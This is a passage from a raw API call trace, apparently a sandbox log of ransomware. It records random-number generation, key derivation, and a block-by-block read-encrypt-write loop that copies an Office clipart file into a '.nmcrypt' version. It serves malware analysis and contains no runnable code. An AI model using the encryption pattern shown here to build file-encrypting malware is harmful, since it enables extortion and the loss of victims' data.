pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0204.462] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0204.463] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0204.463] CryptCreateHash (in: hProv=0x8e34c8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444884 | out: phHash=0x1d444884) returned 1 [0204.463] CryptHashData (hHash=0x9ad178, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0204.463] CryptDeriveKey (in: hProv=0x8e34c8, Algid=0x6610, hBaseData=0x9ad178, dwFlags=0x4, phKey=0x1d444888 | out: phKey=0x1d444888*=0x9ad638) returned 1 [0204.463] CryptSetKeyParam (hKey=0x9ad638, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0204.463] CryptSetKeyParam (hKey=0x9ad638, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0204.463] wcslen (_String="\\\\?\\") returned 0x4 [0204.463] CryptDuplicateKey (in: hKey=0x9ad638, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad5b8) returned 1 [0204.464] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00426_.WMF.NMCRYPT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00426_.wmf.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0204.464] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00426_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00426_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0204.465] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=68776) returned 1 [0204.465] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0204.466] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.478] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.478] GetLastError () returned 0x0 [0204.478] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.479] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.480] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.480] GetLastError () returned 0x0 [0204.480] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.480] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.480] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.480] GetLastError () returned 0x0 [0204.480] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.480] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.480] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.480] GetLastError () returned 0x0 [0204.480] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.480] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.480] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.480] GetLastError () returned 0x0 [0204.480] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.480] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.480] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.480] GetLastError () returned 0x0 [0204.480] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.480] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.481] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.481] GetLastError () returned 0x0 [0204.481] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.481] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.481] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.481] GetLastError () returned 0x0 [0204.481] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.481] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.481] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.481] GetLastError () returned 0x0 [0204.481] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.481] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.481] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.481] GetLastError () returned 0x0 [0204.481] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.481] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.481] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.481] GetLastError () returned 0x0 [0204.481] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.481] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.481] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.481] GetLastError () returned 0x0 [0204.481] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.482] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.482] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.482] GetLastError () returned 0x0 [0204.482] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.482] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.482] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.482] GetLastError () returned 0x0 [0204.482] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.482] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.482] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.482] GetLastError () returned 0x0 [0204.482] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.482] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.482] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.482] GetLastError () returned 0x0 [0204.482] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.482] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.491] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.491] GetLastError () returned 0x0 [0204.491] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.492] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.492] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.492] GetLastError () returned 0x0 [0204.492] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.492] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.492] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, 